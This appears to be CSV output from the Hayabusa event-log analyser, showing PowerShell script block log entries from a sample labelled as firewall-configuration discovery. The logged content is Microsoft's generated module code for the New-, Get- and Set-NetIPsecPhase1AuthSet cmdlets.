$__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletizati",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"on_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 